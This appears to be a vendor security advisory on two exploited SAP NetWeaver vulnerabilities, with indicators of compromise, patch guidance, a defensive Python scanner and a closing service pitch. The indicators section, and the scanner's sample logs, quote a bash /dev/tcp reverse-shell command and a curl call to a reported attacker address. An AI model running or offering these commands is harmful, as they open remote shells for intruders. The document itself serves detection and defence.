SAP NetWeaver Zero-Day: CVE-2025-31324 + 42999 Exploited
🚨 SAP NetWeaver Zero-Day Vulnerabilities: Active Exploitation and Indicators of Compromise
SAP has disclosed two critical zero-day vulnerabilities in its NetWeaver platform: CVE-2025-31324 and CVE-2025-42999. These vulnerabilities are under active exploitation, with attackers deploying web shells and establishing persistent access to enterprise systems.
🔍 CVE-2025-31324 – Unauthenticated File Upload
This vulnerability in the MetadataUploaderServlet of SAP NetWeaver Visual Composer allows unauthenticated attackers to upload arbitrary files, such as JSP web shells, leading to remote code execution. Exploitation has been observed since March 2025, with attackers deploying web shells like cache.jsp, helper.jsp, and randomly named files (e.g., cglswdjp.jsp).
🛡️ CVE-2025-42999 – Insecure Deserialization
This vulnerability allows privileged users to exploit insecure deserialization in the Visual Composer component, potentially leading to remote code execution. While exploitation requires specific user roles, it has been observed in conjunction with CVE-2025-31324 to maintain persistent access.
🎯 Indicators of Compromise (IOCs)
File Artifacts:
- Presence of unauthorized .jsp, .java, or .class files in directories such as:
  /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root
  /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work
  /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync
Network Indicators:
- Outbound connections to IP addresses such as 43.247.135[.]53 over TCP port 10443.
- DNS beaconing to domains like *.oastify.com.
Command Execution:
- Use of reverse shell commands, e.g.:
  /bin/bash -i >& /dev/tcp/43.247.135[.]53/10443 0>&1
  curl http://43.247.135[.]53:10443
🛠️ Recommended Actions
- Immediate Patching: Apply SAP Security Notes #3594142 and #3604119 to address CVE-2025-31324 and CVE-2025-42999, respectively.
- System Audit: Scan for unauthorized files in the specified directories and monitor for unusual network activity.
- Access Controls: Restrict external access to SAP NetWeaver systems and enforce multi-factor authentication for administrative interfaces.
- Monitoring: Implement continuous monitoring to detect and respond to potential threats promptly.
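As an added illustration of the System Audit step (this script is not part of the original advisory and is not SAP's or any vendor's tooling), the following Python code checks a host for the file, network and command-line indicators listed above: it scans the three IRJ directories for unexpected .jsp/.java/.class files and matches log lines against the reported address on TCP 10443, the oastify.com callback domain and the /dev/tcp reverse-shell pattern. The instance root, the log line format and the sample directory tree are constructed for the demo; on a production system, diff the file findings against a known-good baseline of the install rather than treating every match as malicious.

```python
"""
Constructed, stand-alone detection example for the IOCs in the advisory above.
Log line formats and the sample directory tree are invented for illustration.
"""
import re
import tempfile
from pathlib import Path

# IOC values taken from the advisory. The IP is defanged there
# (43.247.135[.]53); it is written plainly here so it matches real log text.
SUSPECT_EXTENSIONS = {".jsp", ".java", ".class"}
KNOWN_SHELLS = {"cache.jsp", "helper.jsp"}
IOC_IP = "43.247.135.53"
IOC_PORT = 10443
IOC_DOMAIN_SUFFIX = ".oastify.com"

# Directories from the advisory, relative to /usr/sap/<SID>/<InstanceID>.
# The instance root is a parameter so the scan can run against a test tree.
IRJ_DIRS = (
    "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root",
    "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work",
    "j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync",
)

IP_PORT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def scan_irj_dirs(instance_root, baseline=frozenset()):
    """Return (relative_path, reason) for suspect files in the listed directories.

    'baseline' holds relative paths of files known to belong to the install,
    so a production scan reports only what deviates from the known-good state.
    """
    root = Path(instance_root)
    findings = []
    for rel in IRJ_DIRS:
        d = root / rel
        if not d.is_dir():
            continue
        # Non-recursive: work/sync is itself in the list, so recursing would double count.
        for p in sorted(d.iterdir()):
            if not p.is_file() or p.suffix.lower() not in SUSPECT_EXTENSIONS:
                continue
            relpath = str(p.relative_to(root))
            if relpath in baseline:
                continue
            reason = "known web shell name" if p.name in KNOWN_SHELLS else "unexpected source/class file"
            findings.append((relpath, reason))
    return findings


def scan_log_lines(lines):
    """Return (indicator, line) pairs for lines matching the network/command IOCs."""
    hits = []
    for line in lines:
        text = line.strip()
        # Outbound connection to the reported address on TCP 10443.
        for ip, port in IP_PORT.findall(text):
            if ip == IOC_IP and int(port) == IOC_PORT:
                hits.append(("c2-connection", text))
                break
        # DNS beaconing to an out-of-band callback domain.
        if IOC_DOMAIN_SUFFIX in text.lower():
            hits.append(("oast-dns", text))
        # bash /dev/tcp reverse shell pattern quoted in the advisory.
        if "/dev/tcp/" in text:
            hits.append(("bash-reverse-shell", text))
    return hits


# Constructed sample log lines (the format is invented; adapt the regexes to your sources).
SAMPLE_LOGS = [
    "2025-05-13T10:02:11Z fw allow src=10.1.2.3:51822 dst=43.247.135.53:10443 proto=tcp",
    "2025-05-13T10:02:12Z dns query name=abc123.oastify.com type=A client=10.1.2.3",
    "2025-05-13T10:02:13Z audit exec uid=sapadm cmd=/bin/bash -i >& /dev/tcp/43.247.135.53/10443 0>&1",
    "2025-05-13T10:03:00Z fw allow src=10.1.2.3:51830 dst=192.0.2.10:443 proto=tcp",
]


def build_sample_tree():
    """Create a throwaway instance tree: one known-name shell, one random-name shell, one benign file."""
    base = Path(tempfile.mkdtemp(prefix="sapirj_"))
    for rel in IRJ_DIRS:
        (base / rel).mkdir(parents=True, exist_ok=True)
    (base / IRJ_DIRS[0] / "cache.jsp").write_text("placeholder")
    (base / IRJ_DIRS[2] / "cglswdjp.jsp").write_text("placeholder")
    (base / IRJ_DIRS[1] / "notes.txt").write_text("benign")
    return base


def run_demo():
    """Scan the constructed tree and sample logs; returns (file_findings, log_hits)."""
    base = build_sample_tree()
    return scan_irj_dirs(base), scan_log_lines(SAMPLE_LOGS)


if __name__ == "__main__":
    files, logs = run_demo()
    for f in files:
        print("FILE", f)
    for h in logs:
        print("LOG ", h)
```

Point scan_irj_dirs at the real instance root (/usr/sap/<SID>/<InstanceID>) and feed scan_log_lines with firewall, DNS and process-audit records from your own collectors; the two reviewed web shell names are flagged by name, and any other .jsp/.java/.class file outside the baseline is reported for manual review.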
🛡️ Enhance Your Security Posture
Given the critical nature of these vulnerabilities, it’s imperative to ensure your systems are protected. Our Patch Management Services can help you stay ahead of such threats by ensuring timely updates and continuous monitoring. Please reach out if you would like to inquire about our patch management or proactive threat hunting capabilities to identify malicious activity, such as this SAP NetWeaver Zero-Day Vulnerability exploitation.